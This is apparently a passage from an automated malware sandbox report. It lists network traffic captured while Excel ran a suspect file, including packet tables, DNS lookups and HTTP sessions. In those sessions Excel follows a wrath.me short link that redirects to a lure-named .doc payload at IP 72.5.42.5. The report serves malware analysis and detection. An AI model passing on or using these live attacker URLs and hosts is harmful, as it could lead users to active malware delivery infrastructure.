              Oct 8, 2024 15:38:33.512800932 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512814045 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512864113 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.512867928 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512907982 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.597069979 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597093105 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597260952 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.597282887 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597305059 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597325087 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597414970 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.597419977 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.597505093 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.598568916 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.598586082 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.598640919 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.598645926 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.598690033 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600063086 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600073099 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600133896 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600140095 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600173950 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600405931 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600420952 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600467920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600471973 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600506067 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600661039 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600673914 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600713015 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.600717068 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.600747108 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.601130009 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601151943 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601181030 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.601185083 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601201057 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601202965 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.601221085 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.601222038 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601233959 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.601247072 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.601275921 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.684864044 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.684926987 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.684994936 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.685015917 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.685041904 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.685062885 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.685636044 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.685678959 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.685868979 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.685874939 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.685920000 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686377048 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686425924 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686455965 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686460972 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686492920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686538935 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686712980 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686755896 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686780930 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686784983 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.686811924 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.686836004 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687179089 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687222958 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687247992 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687252998 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687279940 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687295914 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687669039 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687711000 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687733889 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687738895 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.687766075 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.687781096 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.688383102 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.688424110 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.688458920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.688462973 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.688484907 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.688503981 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.688954115 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.688997030 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.689018011 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.689023972 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.689044952 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.689057112 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.772547960 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.772591114 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.772643089 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.772665977 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.772680044 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.772713900 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.773202896 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.773243904 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.773271084 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.773276091 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.773303986 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.773325920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774497986 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774538994 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774570942 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774575949 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774597883 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774611950 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774780989 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774821043 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774846077 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774851084 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.774874926 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.774893999 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775197983 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775244951 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775259972 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775264978 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775291920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775305986 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775562048 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775604963 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775628090 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775631905 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.775656939 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.775676012 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776036978 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776093960 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776099920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776122093 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776154041 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776168108 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776796103 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776837111 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776860952 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776865959 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.776896000 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.776904106 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863595963 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863645077 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863718987 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863735914 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863765955 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863787889 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863804102 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863856077 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863879919 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863883972 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.863908052 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.863915920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.864123106 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.864165068 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.864188910 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.864192963 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.864216089 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.864237070 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.865691900 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.865735054 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.865767956 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.865772009 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.865792990 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.865808964 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866147041 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866189003 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866210938 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866214991 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866245031 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866256952 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866295099 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866339922 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866358995 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866364002 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866395950 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866453886 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866461039 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866470098 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866504908 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.866533041 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.866549969 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:36.570875883 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:36.570931911 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:36.570996046 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:36.571187973 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:36.571194887 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.216856003 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.217422962 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.217439890 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.218266010 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.218271017 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.315623999 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.315650940 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.315746069 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.315756083 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.315779924 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.315859079 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.316162109 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.316178083 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:37.316186905 CEST65441443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:37.316191912 CEST4436544113.107.246.60192.168.2.6
              Oct 8, 2024 15:38:46.044428110 CEST806543872.5.42.5192.168.2.6
              Oct 8, 2024 15:38:46.044667006 CEST6543880192.168.2.672.5.42.5
              Oct 8, 2024 15:38:46.044667006 CEST6543880192.168.2.672.5.42.5
              Oct 8, 2024 15:38:46.049890041 CEST806543872.5.42.5192.168.2.6

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 8, 2024 15:37:47.396344900 CEST5354573162.159.36.2192.168.2.6
              Oct 8, 2024 15:37:47.947695017 CEST5046553192.168.2.61.1.1.1
              Oct 8, 2024 15:37:47.956320047 CEST53504651.1.1.1192.168.2.6
              Oct 8, 2024 15:38:23.011100054 CEST5851753192.168.2.61.1.1.1
              Oct 8, 2024 15:38:23.343089104 CEST53585171.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 8, 2024 15:37:47.947695017 CEST192.168.2.61.1.1.10x207fStandard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
              Oct 8, 2024 15:38:23.011100054 CEST192.168.2.61.1.1.10xfdbeStandard query (0)wrath.meA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 8, 2024 15:37:20.498356104 CEST1.1.1.1192.168.2.60xffb3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
              Oct 8, 2024 15:37:20.498356104 CEST1.1.1.1192.168.2.60xffb3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
              Oct 8, 2024 15:37:47.956320047 CEST1.1.1.1192.168.2.60x207fName error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
              Oct 8, 2024 15:38:23.343089104 CEST1.1.1.1192.168.2.60xfdbeNo error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
              Oct 8, 2024 15:38:23.343089104 CEST1.1.1.1192.168.2.60xfdbeNo error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
              Oct 8, 2024 15:38:32.222832918 CEST1.1.1.1192.168.2.60x26cdNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
              Oct 8, 2024 15:38:32.222832918 CEST1.1.1.1192.168.2.60x26cdNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • wrath.me
              • otelrules.azureedge.net
              • 72.5.42.5

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.66543872.5.42.5802436C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              Oct 8, 2024 15:38:24.463906050 CEST335OUTGET /550/gv/picturewithgreatworkingthingshaveonhere__________seethegreatnicepictureofmydeargirl_______thebestpciturewhichalwaysnicetobegreatformewith.doc HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
              Connection: Keep-Alive
              Host: 72.5.42.5


              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.665437188.114.96.34432436C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              2024-10-08 13:38:23 UTC192OUTGET /5H4sud HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: wrath.me
              Connection: Keep-Alive
              2024-10-08 13:38:24 UTC1276INHTTP/1.1 302 Found
              Date: Tue, 08 Oct 2024 13:38:24 GMT
              Content-Type: text/plain; charset=utf-8
              Content-Length: 187
              Connection: close
              cross-origin-embedder-policy: require-corp
              cross-origin-opener-policy: same-origin
              cross-origin-resource-policy: same-origin
              x-dns-prefetch-control: off
              x-frame-options: SAMEORIGIN
              strict-transport-security: max-age=15552000; includeSubDomains
              x-download-options: noopen
              x-content-type-options: nosniff
              origin-agent-cluster: ?1
              x-permitted-cross-domain-policies: none
              referrer-policy: no-referrer
              x-xss-protection: 0
              location: http://72.5.42.5/550/gv/picturewithgreatworkingthingshaveonhere__________seethegreatnicepictureofmydeargirl_______thebestpciturewhichalwaysnicetobegreatformewith.doc
              vary: Accept, Accept-Encoding
              x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
              Cache-Control: private
              x-do-orig-status: 302
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFlvEPRWQRS5PhKg52tEYefXZe%2BidH8kQQ5jr6UNL%2FCpDghAYCvNEgm0gNdQTtQOQ3s9B9r%2BmrskcVz%2F9wJsz9jhAHJFwXTfxSzkQ3IayFf2UTOAPSCsH2Keig%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8cf687f3582f7286-EWR
              2024-10-08 13:38:24 UTC93INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 37 32 2e 35 2e 34 32 2e 35 2f 35 35 30 2f 67 76 2f 70 69 63 74 75 72 65 77 69 74 68 67 72 65 61 74 77 6f 72 6b 69 6e 67 74 68 69 6e 67 73 68 61 76 65 6f 6e 68 65 72 65 5f 5f 5f 5f 5f 5f 5f 5f
              Data Ascii: Found. Redirecting to http://72.5.42.5/550/gv/picturewithgreatworkingthingshaveonhere________
              2024-10-08 13:38:24 UTC94INData Raw: 5f 5f 73 65 65 74 68 65 67 72 65 61 74 6e 69 63 65 70 69 63 74 75 72 65 6f 66 6d 79 64 65 61 72 67 69 72 6c 5f 5f 5f 5f 5f 5f 5f 74 68 65 62 65 73 74 70 63 69 74 75 72 65 77 68 69 63 68 61 6c 77 61 79 73 6e 69 63 65 74 6f 62 65 67 72 65 61 74 66 6f 72 6d 65 77 69 74 68 2e 64 6f 63
              Data Ascii: __seethegreatnicepictureofmydeargirl_______thebestpciturewhichalwaysnicetobegreatformewith.doc


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.66544013.107.246.604432436C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              2024-10-08 13:38:32 UTC219OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-10-08 13:38:32 UTC562INHTTP/1.1 200 OK
              Date: Tue, 08 Oct 2024 13:38:32 GMT
              Content-Type: text/plain
              Content-Length: 1112556
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Cache-Control: public
              Last-Modified: Mon, 07 Oct 2024 13:13:22 GMT
              ETag: "0x8DCE6D1D2145AEA"
              x-ms-request-id: 6c9c262e-101e-005a-092f-19882b000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241008T133832Z-1657d5bbd48vlsxxpe15ac3q7n00000004zg00000000ns2g
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              X-Cache-Info: L1_T2
              Accept-Ranges: bytes
              2024-10-08 13:38:32 UTC15822INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
              Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
              2024-10-08 13:38:33 UTC16384INData Raw: 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 41 75 74 68 6f 72 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
              Data Ascii: false"> <S T="1" F="AuthorCount" /> </C> <T> <S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T
              2024-10-08 13:38:33 UTC16384INData Raw: 6e 46 69 76 65 50 6c 75 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 53 55 4d 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54
              Data Ascii: nFivePlusCount"> <A T="SUM"> <S T="1" F="11" /> </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T
